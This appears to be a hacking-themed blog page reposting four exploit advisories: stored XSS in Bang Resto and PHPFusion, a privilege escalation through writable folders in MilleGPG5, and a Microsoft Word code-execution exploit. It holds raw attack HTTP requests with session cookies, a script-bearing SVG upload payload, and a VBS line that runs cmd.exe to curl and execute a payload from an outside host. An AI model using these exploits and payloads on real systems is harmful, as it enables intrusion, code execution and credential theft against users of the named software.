    # Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29848 *Steps to Reproduce:* 1. First login to your admin panel. 2. then go to Menu section and click add new menu from group. your request data will be: POST /bangresto/admin/menu.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/admin/menu.php Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6 Connection: close itemName=test&itemPrice=1&menuID=1&addItem= 3. Then use any XSS Payload in "itemName" parameter and click add. 4. You will see XSS pop up.
  23. HireHackking

    PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) Application: PHPFusion Version: 9.10.30 Bugs: XSS Technology: PHP Vendor URL: https://www.php-fusion.co.uk/home.php Software Link: https://sourceforge.net/projects/php-fusion/ Date of found: 28-04-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1 Host: localhost Content-Length: 1198 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0 Connection: close ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="reqid" 187c77be8e52cf ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]" SVG_XSS.svg ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="mtime[]" 1681116842 ------WebKitFormBoundaryxF2jB690PpLWInAA Content-Disposition: form-data; name="overwrite" 0 ------WebKitFormBoundaryxF2jB690PpLWInAA-- 3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file( http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg) poc video : https://youtu.be/6yBLnRH8pOY
  24. HireHackking

    MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control # Date: 2023-04-28 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://millegpg.it/ # Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/ # Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe # Version: 5.9.2 # Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913 # CVE: CVE-2023-25438 MilleGPG / MilleGPG5 also known as "Governo Clinico 3" Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l. Affected/tested version: MilleGPG5 5.9.2 Summary: Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the Italian general practice network. MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes, complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the General Practitioner, also offering contextual access to the most authoritative scientific content and CME training. Vuln desc: The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness abusing the "write" permission of the main application available to all users on the system or network. Details: Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.: C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application) C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files) C:\Program Files\MilleGPG5\k-platform\ (api and webapp files) such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
  25. HireHackking

    Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.14.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3 ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-ID: CVE-2023-28311 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a `Word` malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping - it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! ```vbs Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus) ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311) ## Reference: [href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311) [href]( https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/) ## Proof and Exploit [href](https://streamable.com/s60x3k) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>